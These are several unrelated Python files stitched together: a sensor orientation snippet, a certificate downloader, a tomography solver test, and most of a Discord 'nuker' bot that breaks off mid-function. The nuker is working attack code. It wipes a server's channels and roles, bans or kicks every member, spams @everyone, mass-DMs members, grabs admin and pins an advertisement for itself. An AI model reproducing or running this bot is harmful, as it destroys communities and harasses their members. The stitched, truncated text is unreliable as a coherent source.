del_bank = abs(finger_bank - hand_bank )
# print("pre "
# + str("{0:.2f}".format(del_attitude)) + " "
# + str("{0:.2f}".format(del_heading)) + " "
# + str("{0:.2f}".format(del_bank)))
if set_offset == False and count == 1:
# del_attitude_offset = del_attitude
# del_heading_offset = del_heading
# del_bank_offset = del_bank
finger_heading_off = finger_heading
hand_heading_off = hand_heading
set_offset = True
print("offset "
+ str("{0:.2f}".format(del_attitude_offset)) + " "
+ str("{0:.2f}".format(del_heading_offset)) + " "
+ str("{0:.2f}".format(del_bank_offset)))
del_attitude = del_attitude - del_attitude_offset
del_heading = del_heading - del_heading_offset
del_bank = del_bank - del_bank_offset
# print("post "
# + str("{0:.2f}".format(del_attitude)) + " "
# + str("{0:.2f}".format(del_heading)) + " "
# + str("{0:.2f}".format(del_bank)))
hand_heading = hand_heading - hand_heading_off
finger_heading = finger_heading - finger_heading_off
print("post "
+ str("{0:.2f}".format(hand_heading)) + " "
+ str("{0:.2f}".format(finger_heading)) + " "
+ str("{0:.2f}".format(finger_heading - hand_heading)))
count = count+1
time.sleep(0.01) |
import os
from multiprocessing.pool import ThreadPool
from pathlib import Path
from tqdm import tqdm
from typing import Sequence, Tuple, List
import requests
from sec_certs.files import search_files
CC_WEB_URL = 'https://www.commoncriteriaportal.org'
def download_file(url: str, output: Path) -> int:
r = requests.get(url, allow_redirects=True)
try:
with open(output, "wb") as f:
f.write(r.content)
except (OSError, ConnectionError) as e:
print('ERROR: Failed to download {} with {}'.format(url, e))
return r.status_code
def download_parallel(items: Sequence[Tuple[str, Path]], num_threads: int) -> Sequence[Tuple[str, int]]:
def download(url_output):
url, output = url_output
return url, download_file(url, output)
pool = ThreadPool(num_threads)
responses = []
with tqdm(total=len(items)) as progress:
for response in pool.imap(download, items):
progress.update(1)
responses.append(response)
pool.close()
pool.join()
return responses
def download_cc_web(web_dir: Path, num_threads: int) -> Sequence[Tuple[str, int]]:
items = [
("https://www.commoncriteriaportal.org/products/", web_dir / "cc_products_active.html"),
("https://www.commoncriteriaportal.org/products/index.cfm?archived=1",
web_dir / "cc_products_archived.html"),
("https://www.commoncriteriaportal.org/labs/", web_dir / "cc_labs.html"),
("https://www.commoncriteriaportal.org/products/certified_products.csv",
web_dir / "cc_products_active.csv"),
("https://www.commoncriteriaportal.org/products/certified_products-archived.csv",
web_dir / "cc_products_archived.csv"),
("https://www.commoncriteriaportal.org/pps/", web_dir / "cc_pp_active.html"),
("https://www.commoncriteriaportal.org/pps/collaborativePP.cfm?cpp=1",
web_dir / "cc_pp_collaborative.html"),
("https://www.commoncriteriaportal.org/pps/index.cfm?archived=1",
web_dir / "cc_pp_archived.html"),
("https://www.commoncriteriaportal.org/pps/pps.csv", web_dir / "cc_pp_active.csv"),
("https://www.commoncriteriaportal.org/pps/pps-archived.csv",
web_dir / "cc_pp_archived.csv")]
return download_parallel(items, num_threads)
def download_cc(walk_dir: Path, cert_list, num_threads: int) -> Sequence[Tuple[str, int]]:
items = []
for cert in cert_list:
if cert[0].find(CC_WEB_URL) != -1:
items.append((cert[0], walk_dir / "certs" / cert[1]))
else:
items.append((CC_WEB_URL + cert[0], walk_dir / "certs" / cert[1]))
if len(cert) > 2 and cert[3] != "":
if cert[2].find(CC_WEB_URL) != -1:
items.append((cert[2], walk_dir / "targets" / cert[3]))
else:
items.append((CC_WEB_URL + cert[2], walk_dir / "targets" / cert[3]))
return download_parallel(items, num_threads)
def download_cc_failed(walk_dir: Path, num_threads: int) -> Sequence[Tuple[str, int]]:
# obtain list of all downloaded pdf files and their size
# check for pdf files with too small length
# generate download script again (single one)
# visit all relevant subfolders
sub_folders = ['certs', 'targets']
# the smallest correct certificate downloaded was 71kB, if server error occurred, it was only 1245 bytes
MIN_CORRECT_CERT_SIZE = 5000
download_again = []
for sub_folder in sub_folders:
target_dir = walk_dir / sub_folder
# obtain list of all downloaded pdf files and their size
files = search_files(target_dir)
for file_name in files:
# process only .pdf files
if not os.path.isfile(file_name):
continue
file_ext = file_name[file_name.rfind('.'):].upper()
if file_ext != '.PDF' and file_ext != '.DOC' and file_ext != '.DOCX':
continue
# obtain size of file
file_size = os.path.getsize(file_name)
if file_size < MIN_CORRECT_CERT_SIZE:
# too small file, likely failed download - retry
file_name_short = file_name[file_name.rfind(os.sep) + 1:]
download_link = f'{CC_WEB_URL}/files/epfiles/{file_name_short}'
download_again.append((download_link, file_name))
return download_parallel(download_again, num_threads)
def download_fips_web(web_dir: Path):
download_file(
"https://csrc.nist.gov/projects/cryptographic-module-validation-program/validated-modules/search?SearchMode=Advanced&CertificateStatus=Active&ValidationYear=0",
web_dir / "fips_modules_active.html")
download_file(
"https://csrc.nist.gov/projects/cryptographic-module-validation-program/validated-modules/search?SearchMode=Advanced&CertificateStatus=Historical&ValidationYear=0",
web_dir / "fips_modules_historical.html")
download_file(
"https://csrc.nist.gov/projects/cryptographic-module-validation-program/validated-modules/search?SearchMode=Advanced&CertificateStatus=Revoked&ValidationYear=0",
web_dir / "fips_modules_revoked.html")
def download_fips(web_dir: Path, policies_dir: Path, num_threads: int, ids: List[str]) \
-> Tuple[Sequence[Tuple[str, int]], int]:
web_dir.mkdir(exist_ok=True)
policies_dir.mkdir(exist_ok=True)
html_items = [
(f"https://csrc.nist.gov/projects/cryptographic-module-validation-program/certificate/{cert_id}",
web_dir / f"{cert_id}.html") for cert_id in ids if not (web_dir / f'{cert_id}.html').exists()]
sp_items = [
(
f"https://csrc.nist.gov/CSRC/media/projects/cryptographic-module-validation-program/documents/security-policies/140sp{cert_id}.pdf",
policies_dir / f"{cert_id}.pdf") for cert_id in ids if not (policies_dir / f'{cert_id}.pdf').exists()
]
return download_parallel(html_items + sp_items, num_threads), len(html_items) + len(sp_items)
|
<filename>sandbox/test_solver.py
import sys
import os
import numpy as np
import matplotlib.pyplot as plt
sys.path.insert(1, '/home/axel/workspace/contomo/')
import utils
from FVM import FiniteVolumes
from solver import FVMSolver
from sinogram_interpolator import SinogramSplineInterpolator
from basis import LinearTetraMeshBasis, TetraMesh
from analytical_phantom import AnalyticalPhantom
from projector import Projector
ap = AnalyticalPhantom.load('/home/axel/workspace/contomo/dem_inversion/dem_phantom')
N = ap.dynamic_sinograms[0].shape[0]
volume_shape = (N,N,N)
reference_projector = Projector( (N,N,N), N, N, ap.static_projection_angles[0] )
initial_volume = np.load('astra_recon_initial_volume.npy')
final_volume = np.load('astra_recon_final_volume.npy')
assert np.sum(initial_volume<0)==0
projector = Projector( (N,N,N), N, N, ap.dynamic_projection_angles[0] )
current_volume = initial_volume.copy()
sample_times = np.array(ap.dynamic_sample_times)
sinograms = np.array(ap.dynamic_sinograms)
spline_interp = SinogramSplineInterpolator(sample_times, sinograms, smoothness=0, order=2)
spline_interp.save_state()
dt_sampling = (sample_times[1]-sample_times[0]) # time between two sinograms (assumed to be uniform)
nbr_of_substeps = 1 # number of integration steps between sample times
dt = dt_sampling/nbr_of_substeps # time between two integration steps
integration_times = np.arange(sample_times[0], sample_times[-3] + dt, dt)
volumes = [current_volume.copy()]
assert ap.static_projection_angles[0][0]==ap.dynamic_projection_angles[0][0]
assert np.linalg.norm( ap.static_sinograms[0][:,0,:] - sinograms[0,:,0,:] )==0
print('##############################################################################')
print(' R A Y M O D E L E R R O R ')
ray_model_error = np.linalg.norm( projector.forward_project( initial_volume ) - sinograms[0])
print( ray_model_error )
print('##############################################################################')
# Define a finite basis for velocities.
dx = ap.pixel_size
esize = N/8.0
velocity_basis = TetraMesh()
velocity_basis.generate_mesh_from_numpy_array( np.ones((N,N,N),dtype=np.uint8), dx, max_cell_circumradius=esize*dx, max_facet_distance=esize*dx)
velocity_basis.expand_mesh_data()
print('Nelm: ',velocity_basis.enod.shape[0])
print('Nnods: ',velocity_basis.coord.shape[0])
velocity_basis.to_xdmf('dem_phantom_mesh')
# We define a scaled set of meshes to be used in the velocity recovery step
origin = (0,0,0)
dx_scaled = 1.0
scaled_flow_model = FiniteVolumes( origin, dx_scaled, current_volume.shape )
scaled_velocity_basis = TetraMesh()
scaled_velocity_basis.generate_mesh_from_numpy_array( np.ones((N,N,N),dtype=np.uint8), dx, max_cell_circumradius=esize*dx, max_facet_distance=esize*dx)
scaled_velocity_basis.coord = scaled_velocity_basis.coord/dx
scaled_velocity_basis.nodal_coordinates = scaled_velocity_basis.nodal_coordinates/dx
scaled_velocity_basis.expand_mesh_data()
scaled_velocity_basis.to_xdmf('dem_scaled_phantom_mesh')
scaled_velocity_basis.coefficents = np.zeros( scaled_velocity_basis.nodal_coordinates.shape )
scaled_velocity_basis.precompute_basis( scaled_flow_model.Xi + scaled_flow_model.dx/2., scaled_flow_model.Yi, scaled_flow_model.Zi, label='xp' )
scaled_velocity_basis.precompute_basis( scaled_flow_model.Xi - scaled_flow_model.dx/2., scaled_flow_model.Yi, scaled_flow_model.Zi, label='xn' )
scaled_velocity_basis.precompute_basis( scaled_flow_model.Xi, scaled_flow_model.Yi + scaled_flow_model.dx/2., scaled_flow_model.Zi, label='yp' )
scaled_velocity_basis.precompute_basis( scaled_flow_model.Xi, scaled_flow_model.Yi - scaled_flow_model.dx/2., scaled_flow_model.Zi, label='yn' )
scaled_velocity_basis.precompute_basis( scaled_flow_model.Xi, scaled_flow_model.Yi, scaled_flow_model.Zi + scaled_flow_model.dx/2., label='zp' )
scaled_velocity_basis.precompute_basis( scaled_flow_model.Xi, scaled_flow_model.Yi, scaled_flow_model.Zi - scaled_flow_model.dx/2., label='zn' )
solver = FVMSolver( None, scaled_flow_model, projector, scaled_velocity_basis, None )
solver.x0 = np.zeros( scaled_velocity_basis.coefficents.shape )
solver.print_frequency = 1
res2_norm = np.inf
sinogram_residual_history = []
recon_times = []
#i=0
for current_time in integration_times:
#i+=1
#if i==2: raise
current_time_indx = np.round( (current_time + dt)/dt_sampling ).astype(int)
print(' ')
print('############################## T A R G E T T I M E I N D E X : '+str((current_time + dt)/dt_sampling)+' (t='+str(current_time)+') ############################################')
verbose = True
def dydt(t,y):
# Interpolate measurements for target time; t interpolating with projections from the current state y.
spline_interp.add_points( [t], [projector.forward_project( y )] , resolution = dt_sampling*1e-8 )
dgdt = spline_interp( [t], derivative=1 )[0,:,:,:]
spline_interp.reset()
# Rescale units of the problem to give better numerical properties.
dt_sampling_scaled = dt_sampling
dgdt_scaled = dgdt*dt_sampling_scaled
scaled_flow_model.fixate_density_field( y )
# Nonlinear optimization step
solver.density_field = y
solver.second_member = -dgdt_scaled
solver.iteration = 0
solver.set_CFL_scaling_dimensions( (dx/dt_sampling_scaled)*dt/dx )
#solver.set_cfl_constraint( solver.flow_model.dx, 1.0 )
#solver.set_cfl_constraint( solver.flow_model.dx, 1.0, sensitivity_fix_threshold=0, verbose=True )
#solver.check_jac(solver.x0.flatten())
#solver.check_hessian(solver.x0.flatten())
#solver.set_uniform_bounds( -(dx/dt_sampling_scaled)*dx/dt, (dx/dt_sampling_scaled)*dx/dt )
# TODO: some more investioagtions of the convergence and the negative denseties
# seems the hessian lsq solution is not perhaps the "right" solution to pick.
# if CFL < 1 one would expect that no negative denseties would appear....
solver.solve( maxiter=10, verbose=verbose, method='L-BFGS-B' )
#solver.solve( maxiter=5, verbose=True, method='Builtin Newton' )
solver.x0 = solver.x
print(' ')
# Optimal velocity solution
velocity_basis.coefficents = solver.x*(dx/dt_sampling_scaled) # add units
#velocity_basis.coefficents = np.zeros( scaled_velocity_basis.coefficents.shape )
#velocity_basis.coefficents[:,2] = 0.1
fvm_propagator = FiniteVolumes( origin, dx, y.shape )
# If the CFL is too large it makes sense to restart the iteration with a smaller dt.
maxCFL = fvm_propagator.max_CFL(velocity_basis, y, dt)
assert maxCFL<1, 'The reconstructed velocities lead to unfesible local CFL='+str(maxCFL)+'>1'
vertex_velocity = []
negtags = ['xn','yn','zn']
postags = ['xp','yp','zp']
sx,sy,sz = y.shape
for axis,(n,p) in enumerate( zip(negtags,postags) ):
vn = scaled_velocity_basis.rendered_basis[n].T.dot( velocity_basis.coefficents[ :, axis ] ).reshape(sx-4,sy-4,sz-4)
vp = scaled_velocity_basis.rendered_basis[p].T.dot( velocity_basis.coefficents[ :, axis ] ).reshape(sx-4,sy-4,sz-4)
vertex_velocity.append( (vn, vp) )
return fvm_propagator.get_dfbardt(vertex_velocity, y)
old_TV = utils.get_total_variation(current_volume)
old_mass = np.sum(current_volume)
# Check that dt is strong stability preserving for a single forward euler step
x0_copy = solver.x0.copy()
verbose = False
euler_volume = utils.euler_step(dydt, current_time, current_volume.copy(), dt)
verbose = True
solver.x0 = x0_copy
euler_TV = utils.get_total_variation(euler_volume)
#current_volume = utils.RK4_step(dydt, current_time, current_volume.copy(), dt)
#current_volume = utils.RK3_step(dydt, current_time, current_volume.copy(), dt)
current_volume = utils.TVD_RK3_step(dydt, current_time, current_volume.copy(), dt)
#current_volume = utils.euler_step(dydt, current_time, current_volume.copy(), dt)
current_TV = utils.get_total_variation(current_volume)
current_mass = np.sum(current_volume)
print('Euler TV diff = ', euler_TV - old_TV )
print('TV diff = ', current_TV - old_TV )
print('mass fraction diff = '+str(np.abs(current_mass - old_mass)/old_mass))
print('min density = ', np.min(current_volume) )
# assert that the total vartiation is diminished, the masss preserved and the denseties positive
#assert current_TV - old_TV < 0, 'TV diff = '+str(current_TV - old_TV)
#assert np.abs(current_mass - old_mass)/old_mass < 1e-4, 'mass fraction diff = '+str(np.abs(current_mass - old_mass)/old_mass)
#assert np.sum(current_volume<-1e-8)==0, str(current_volume[current_volume<-1e-8].flatten())
if current_time_indx!=0 and np.abs( current_time_indx - ((current_time+dt)/dt_sampling) ) < (dt/2.):
volumes.append(current_volume.copy())
res1 = projector.forward_project(volumes[-2]) - sinograms[current_time_indx]
res2 = projector.forward_project(volumes[-1]) - sinograms[current_time_indx]
res1_norm = np.linalg.norm(res1)
res2_norm = np.linalg.norm(res2)
print( 'Sino res before: ',res1_norm)
print( 'Sino res after : ',res2_norm)
print('(Inherent ray model error: ', ray_model_error,')')
sinogram_residual_history.append( res2_norm )
recon_times.append( current_time )
print('#####################################################################################################################')
print(' ')
print('Final real space volume residual: ', np.linalg.norm(final_volume - current_volume))
print('to be compared to: ', np.linalg.norm(final_volume - initial_volume))
np.save( 'reconstructed_volumes/sinogram_residual_history.npy', np.array(sinogram_residual_history))
np.save( 'reconstructed_volumes/recon_times.npy', np.array(recon_times))
os.system('rm reconstructed_volumes/reconstructed_*')
for i,vol in enumerate(volumes):
sino_res = np.abs( projector.forward_project( vol ) - sinograms[i] )
sino_res_images = np.vstack( [sino_res[:,i,:] for i in range(sino_res.shape[1])] )
sino_res_images = np.expand_dims(sino_res_images, axis=2)
np.save('reconstructed_volumes/reconstructed_volume_'+str(i)+'.npy', vol)
utils.save_as_vtk_voxel_volume('reconstructed_volumes/reconstructed_volume_'+str(i), vol)
utils.save_as_vtk_voxel_volume('reconstructed_volumes/reconstructed_sino_residual_'+str(i), sino_res_images)
|
<reponame>ICEGXG/UntitledNuker
import json
import os
import traceback
import colorama
import discord
import requests
from colorama import Fore
from discord.ext import commands
colorama.init()
os.system('cls')
try:
with open("version.txt") as data:
version = data.readline()
except FileNotFoundError:
try:
with open("../version.txt") as data:
version = data.readline()
except FileNotFoundError:
version = ""
embedColor = 0x5c92ff
colors = {"main": Fore.CYAN,
"white": Fore.WHITE,
"red": Fore.RED}
msgs = {"info": f"{colors['white']}[{colors['main']}i{colors['white']}]",
"+": f"{colors['white']}[{colors['main']}+{colors['white']}]",
"error": f"{colors['white']}[{colors['red']}e{colors['white']}]",
"input": f"{colors['white']}{colors['main']}>>{colors['white']}",
"pressenter": f"{colors['white']}[{colors['main']}i{colors['white']}] Press ENTER to exit"}
async def msg_delete(ctx):
"""
Trying to delete activation message
"""
try:
await ctx.message.delete()
except:
print(f"{msgs['error']} Can't delete your message")
def userOrBot():
"""
Returns True if token belongs to user's account
Returns False if token belongs to bot's account
"""
if requests.get("https://discord.com/api/v8/users/@me", headers={"Authorization": f'{token}'}).status_code == 200:
return True
else:
return False
def checkVersion():
"""
Checking for new versions on GitHub
"""
if version == "":
return ""
req = requests.get(
"https://raw.githubusercontent.com/ICEGXG/UntitledNuker/master/version.txt")
if req.status_code == requests.codes.ok:
gitVersion = req.text.rstrip()
if version == gitVersion:
return "(Latest)"
else:
return "(Update available)"
else:
return "(Update check failed)"
def checkActivity(type, text):
if type == "playing":
return discord.Game(name=text)
elif type == "listening":
return discord.Activity(type=discord.ActivityType.listening, name=text)
elif type == "watching":
return discord.Activity(type=discord.ActivityType.watching, name=text)
else:
return None
print(f'{colors["main"]}\n\n __ __ __ __ ______ __ ______ __ ______ _____ ' + "\n"
r' /\ \/\ \/\ "-.\ \/\__ _/\ \/\__ _/\ \ /\ ___\/\ __-. ' + "\n"
r' \ \ \_\ \ \ \-. \/_/\ \\ \ \/_/\ \\ \ \___\ \ __\\ \ \/\ \ ' + "\n"
r' \ \_____\ \_\\"\_\ \ \_\\ \_\ \ \_\\ \_____\ \_____\ \____- ' + "\n"
r' \/_____/\/_/ \/_/ \/_/ \/_/ \/_/ \/_____/\/_____/\/____/ ' + "\n"
'\n'
r' __ __ __ __ __ __ ______ ______ ' + "\n"
r' /\ "-.\ \/\ \/\ \/\ \/ / /\ ___\/\ == \ ' + "\n"
r' \ \ \-. \ \ \_\ \ \ _"-\ \ __\\ \ __< ' + "\n"
r' \ \_\\"\_\ \_____\ \_\ \_\ \_____\ \_\ \_\ ' + "\n"
r' \/_/ \/_/\/_____/\/_/\/_/\/_____/\/_/ /_/ '
"\n"
"\n"
"\n"
f"{colors['white']} Author: {colors['main']}ICE#4449\n"
f"{colors['white']} Version: {colors['main']}{version} {checkVersion()}\n"
f"{colors['white']} GitHub: {colors['main']}https://github.com/ICEGXG/UntitledNuker\n\n{colors['white']}")
"""
Fetching prefix, token and owner ID's from config
If there's no config, requests data from the user and creates it
"""
try:
with open(f"config.json", encoding='utf8') as data:
config = json.load(data)
token = config["token"]
prefix = config["prefix"]
owners = config["owners"]
whiteListBool = config["whitelistbool"]
activity = config["activity"]
print(f"{msgs['info']} Loaded config.json")
except FileNotFoundError:
token = input(f"Paste token {msgs['input']} ")
prefix = input(f"Paste prefix {msgs['input']} ")
owners = input(
f"Paste bot's owner ID (If several use ',') {msgs['input']} ")
whiteListYesOrNo = input(
f"Enable whitelisting (y/n) {msgs['input']} ").lower()
whiteListBool = True if whiteListYesOrNo == "y" else False
owners = owners.replace(" ", "")
if "," in owners:
owners = owners.split(",")
owners = list(map(int, owners))
else:
owners = [int(owners)]
activity = {"type": "playing",
"text": f"Untitled Nuker v{version}",
"isenabled": True}
config = {
"token": token,
"prefix": prefix,
"owners": owners,
"whitelistbool": whiteListBool,
"activity": activity
}
with open("config.json", "w") as data:
json.dump(config, data, indent=2)
print(f"{msgs['info']} Created config.json")
# shitcode :)
if userOrBot() == True:
print(f"{msgs['info']} Untitled Nuker doesn't support self bots now, it will likely be added in next versions")
print(msgs['pressenter'])
input()
os._exit(0)
if activity["isenabled"]:
activityToBot = checkActivity(activity["type"], activity["text"])
else:
activityToBot = None
bot = commands.Bot(command_prefix=prefix, self_bot=userOrBot(),
activity=activityToBot, intents=discord.Intents.all())
bot.remove_command("help")
def isOwner(ctx):
return ctx.author.id in owners
def isWhitelisted(ctx):
if whiteListBool:
return ctx.author.id in owners
else:
return True
@bot.event
async def on_ready():
print(f"\n\n{colors['main']}" + ("═"*75).center(95) + f"\n{colors['white']}" +
f"Logged in as {bot.user}".center(95) + "\n" +
f"Prefix: {bot.command_prefix}".center(95) + "\n" +
f"Total servers: {len(bot.guilds)}".center(95) + "\n" +
f"Total members: {len(bot.users)} ".center(95) + f"\n{colors['main']}" + ("═"*75).center(95) + f"\n\n{colors['white']}")
@bot.event
async def on_command(ctx):
print(
f"{msgs['info']} Executed {ctx.command} ({colors['main']}{ctx.message.author}{colors['white']})")
@bot.event
async def on_command_error(ctx, err):
errors = commands.errors
if (isinstance(err, errors.BadArgument) or isinstance(err, commands.MissingRequiredArgument)
or isinstance(err, errors.PrivateMessageOnly) or isinstance(err, errors.CheckFailure)
or isinstance(err, errors.CommandNotFound)):
return
elif isinstance(err, errors.MissingPermissions):
print(f"{msgs['error']} Missing permissions")
else:
print(
f'{colors["red"]}\n\n{"".join(traceback.format_exception(type(err), err, err.__traceback__))}{colors["white"]}\n')
@bot.command(name='help')
@commands.check(isWhitelisted)
async def help(ctx):
await msg_delete(ctx)
p = bot.command_prefix
embed = discord.Embed(title="Help", color=embedColor)
embed.set_author(name="<NAME>",
url="https://github.com/ICEGXG/UntitledNuker")
embed.add_field(
name="Nuke", value=f">>> `{p}1 <ban 1/0> <your text>`", inline=False)
embed.add_field(name="Ban everyone", value=f">>> `{p}2`", inline=False)
embed.add_field(name="Kick everyone", value=f">>> `{p}3`", inline=False)
embed.add_field(name="Rename everyone",
value=f">>> `{p}4 <new nickname>`", inline=False)
embed.add_field(name="DM everyone",
value=f">>> `{p}5 <message>`", inline=False)
embed.add_field(name="Spam to all channels",
value=f">>> `{p}6 <amount> <text>`", inline=False)
embed.add_field(name="Spam to current channel",
value=f">>> `{p}7 <amount> <text>`", inline=False)
embed.add_field(name="Delete all channels",
value=f">>> `{p}8`", inline=True)
embed.add_field(name="Delete all roles", value=f">>> `{p}9`", inline=True)
embed.add_field(name="\u200b", value="\u200b", inline=True)
embed.add_field(name="Spam with channels",
value=f">>> `{p}10 <amount> <name>`", inline=True)
embed.add_field(name="Spam with roles",
value=f">>> `{p}11 <amount> <name>`", inline=True)
embed.add_field(name="\u200b", value="\u200b", inline=True)
embed.add_field(name="Edit server icon",
value=f">>> Image is attachment\n`{p}12`", inline=True)
embed.add_field(name="Edit server name",
value=f">>> `{p}13 <name>`", inline=True)
embed.add_field(name="Get admin",
value=f">>> `{p}14 <name of role>`", inline=False)
# embed.add_field(name="\u200b", value="\u200b", inline=True)
embed.add_field(
name="Revive (DM Only)", value=f">>> Creating 1 text channel on server if you deleted all\n`{p}15 <guild id>`", inline=False)
embed.add_field(name="Settings", value=f">>> `{p}settings`")
embed.add_field(name="\u200b\nInfo",
value=f">>> **Untitled Nuker**\nMade by <@404323<PASSWORD>561837066>\nVersion: {version} {checkVersion()}\nGitHub: https://github.com/ICEGXG/UntitledNuker\n", inline=False)
await ctx.message.author.send(embed=embed)
@bot.group(name='settings', aliases=["config"], invoke_without_command=True)
@commands.check(isWhitelisted)
async def settings(ctx):
p = bot.command_prefix
embed = discord.Embed(
title="Settings", description="Available settings\n`Only for owners`", color=embedColor)
embed.set_author(name="Untitled Nuker",
url="https://github.com/ICEGXG/UntitledNuker")
embed.add_field(
name="Prefix", value=f">>> Change prefix\n`{p}settings prefix <prefix>`", inline=False)
embed.add_field(
name="Owners", value=f">>> Add or remove user from owners\n`{p}settings owners <add/remove> <ID/mention>`", inline=False)
embed.add_field(
name="Whitelist", value=f">>> Enable or disable whitelisting\n`{p}settings whitelist <on/off>`", inline=True)
embed.add_field(
name="Activity", value=f">>> Change or disable activity\nAvailable types: `playing`, `listening`, `watching`\n`{p}settings activity <set/off> <type> <text>`", inline=False)
await ctx.message.author.send(embed=embed)
@settings.command(name='prefix')
@commands.check(isOwner)
async def settingsPrefix(ctx, newPrefix):
global config
bot.command_prefix = newPrefix
config['prefix'] = newPrefix
with open("config.json", "w") as data:
json.dump(config, data, indent=2)
await ctx.message.add_reaction('✅')
print(
f"{msgs['info']} Prefix is {colors['main']}{newPrefix}{colors['white']} now")
@settings.command(name='owners')
@commands.check(isOwner)
async def settingOwners(ctx, action, *, users):
global config
users = users.replace('<@!', '')
users = users.replace('>', '')
users = users.replace(" ", "")
if "," in users:
users = users.split(",")
users = list(map(int, users))
else:
users = [int(users)]
if action == "add":
config["owners"] += users
with open("config.json", "w") as data:
json.dump(config, data, indent=2)
print(
f"{msgs['info']} Added {colors['main']}{str(users)[1:-1]}{colors['white']} to owners")
await ctx.message.add_reaction('✅')
elif action == "remove" or "delete":
for user in users:
config["owners"].remove(user)
with open("config.json", "w") as data:
json.dump(config, data, indent=2)
print(
f"{msgs['info']} Removed {colors['main']}{str(users)[1:-1]}{colors['white']} from owners")
await ctx.message.add_reaction('✅')
else:
await ctx.message.add_reaction('❌')
@settings.command(name='whitelist', aliases=["whitelisting"])
@commands.check(isOwner)
async def settingsWhitelist(ctx, action):
global config
global whiteListBool
if action.lower() == "on" or "enable":
whiteListBool = True
config["whitelistbool"] = True
with open("config.json", "w") as data:
json.dump(config, data, indent=2)
print(f"{msgs['info']} Enabled whitelisting")
await ctx.message.add_reaction('✅')
elif action.lower() == "off" or "disable":
whiteListBool = False
config["whitelistbool"] = False
with open("config.json", "w") as data:
json.dump(config, data, indent=2)
print(f"{msgs['info']} Disabled whitelisting")
await ctx.message.add_reaction('✅')
else:
await ctx.message.add_reaction('❌')
@settings.command(name='activity')
@commands.check(isOwner)
async def settingsActivity(ctx, action, activityType="playing", *, text=f"Untitled Nuker v{version}"):
global config
global activity
if action == "set":
await bot.change_presence(activity=checkActivity(activityType, text))
activity = {"type": activityType,
"text": text,
"isenabled": True}
config["activity"] = activity
with open("config.json", "w") as data:
json.dump(config, data, indent=2)
print(f"{msgs['info']} Changed activity")
await ctx.message.add_reaction('✅')
elif action == "on" or action == "enable":
await bot.change_presence(activity=checkActivity(activity["type"], activity["text"]))
activity["isenabled"] = True
config["activity"] = activity
with open("config.json", "w") as data:
json.dump(config, data, indent=2)
print(f"{msgs['info']} Enabled activity")
await ctx.message.add_reaction('✅')
elif action == "off" or action == "disable":
await bot.change_presence(activity=None)
activity["isenabled"] = False
config["activity"] = activity
with open("config.json", "w") as data:
json.dump(config, data, indent=2)
print(f"{msgs['info']} Disabled activity")
await ctx.message.add_reaction('✅')
else:
await ctx.message.add_reaction('❌')
@bot.command(name='1', aliases=["nk", "nuke"])
@commands.check(isWhitelisted)
async def nuke(ctx, ban: bool = True, text: str = "Untitled Nuker"):
await msg_delete(ctx)
"""
Trying to change server icon and name
"""
icon = await ctx.message.attachments[0].read() if ctx.message.attachments else None
await ctx.guild.edit(name=text, icon=icon, banner=icon)
"""
Trying to delete all channels
"""
for ch in ctx.guild.channels:
try:
await ch.delete()
print(f"{msgs['+']} Deleted {ch}")
except:
print(f"{msgs['error']} Can't delete {ch}")
"""
Trying to ban everyone if requested
"""
if ban:
for m in ctx.guild.members:
if m.id not in owners:
try:
await m.ban()
print(f"{msgs['+']} Banned {m}")
except:
print(f"{msgs['error']} can't ban {m}")
else:
print(f"{msgs['info']} {m} is owner")
"""
Trying to delete roles
"""
for r in ctx.guild.roles:
try:
await r.delete()
print(f"{msgs['+']} Deleted {r}")
except:
print(f"{msgs['error']} Can't delete {r}")
try:
embed = discord.Embed(color=embedColor)
embed.add_field(name="This server is Nuked",
value="By Unitled Nuker\nDownload: https://github.com/ICEGXG/UntitledNuker", inline=False)
channel = await ctx.guild.create_text_channel(name="Untitled Nuker")
message = await channel.send(embed=embed)
await message.pin()
except:
pass
@bot.command(name='2', aliases=["be", "baneveryone"])
@commands.check(isWhitelisted)
async def banEveryone(ctx):
await msg_delete(ctx)
for m in ctx.guild.members:
if m.id not in owners:
try:
await m.ban()
print(f"{msgs['+']} Banned {m}")
except:
print(f"{msgs['error']} can't ban {m}")
else:
print(f"{msgs['info']} {m} is owner")
@bot.command(name='3', aliases=["ke", "kickeveryone"])
@commands.check(isWhitelisted)
async def kickEveryone(ctx):
await msg_delete(ctx)
for m in ctx.guild.members:
if m.id not in owners:
try:
await m.kick()
print(f"{msgs['+']} Kicked {m}")
except:
print(f"{msgs['error']} can't kick {m}")
else:
print(f"{msgs['info']} {m} is owner")
@bot.command(name="4", aliases=["chen"])
@commands.check(isWhitelisted)
async def renameEveryone(ctx, *, name="Untitled Nuker"):
await msg_delete(ctx)
for m in ctx.guild.members:
if m.id not in owners:
try:
await m.edit(nick=name)
print(f"{msgs['+']} Changed {m}'s nickname")
except:
print(f"{msgs['error']} Can't change {m}'s nickname")
else:
print(f"{msgs['info']} {m.name} is owner")
@bot.command(name="5", aliases=["dme"])
@commands.check(isWhitelisted)
async def dmEveryone(ctx, *, msg="Untitled Nuker"):
await msg_delete(ctx)
for m in ctx.guild.members:
if m.id not in owners:
try:
await m.send(msg)
print(f"{msgs['+']} Message sent to {m}")
except:
print(f"{msgs['error']} Can't send message to {m}")
else:
print(f"{msgs['info']} {m.name} is owner")
@bot.command(name="6", aliases=["sa"])
@commands.check(isWhitelisted)
async def spamToAllChannels(ctx, amount: int = 50, *, text="@everyone Untitled Nuker"):
await msg_delete(ctx)
for i in range(amount):
for ch in ctx.guild.channels:
try:
await ch.send(text)
print(f"{msgs['+']} Message sent to {ch}")
except:
print(f"{msgs['error']} Can't send message to {ch}")
@bot.command(name='7', aliases=["sc"])
@commands.check(isWhitelisted)
async def spamToCurrentChannel(ctx, amount: int = 50, *, text="@everyone Untitled Nuker"):
await msg_delete(ctx)
for i in range(amount):
try:
await ctx.channel.send(text)
print(f"{msgs['+']} Message sent to {ctx.channel}")
except:
print(f"{msgs['error']} Can't send message to {ctx.channel}")
@bot.command(name='8', aliases=["dch"])
@commands.check(isWhitelisted)
async def deleteAllChannels(ctx):
await msg_delete(ctx)
for ch in ctx.guild.channels:
try:
await ch.delete()
print(f"{msgs['+']} Deleted {ch}")
except:
print(f"{msgs['error']} Can't delete {ch}")
@bot.command(name='9', aliases=["dr"])
@commands.check(isWhitelisted)
async def deleteAllRoles(ctx):
await msg_delete(ctx)
for r in ctx.guild.roles:
try:
await r.delete()
print(f"{msgs['+']} Deleted {r}")
except:
print(f"{msgs['error']} Can't delete {r}")
@bot.command(name="10", aliases=["sch"])
@commands.check(isWhitelisted)
async def spamWithChannels(ctx, amount: int = 25, *, name="Untitled Nuker"):
await msg_delete(ctx)
for i in range(amount):
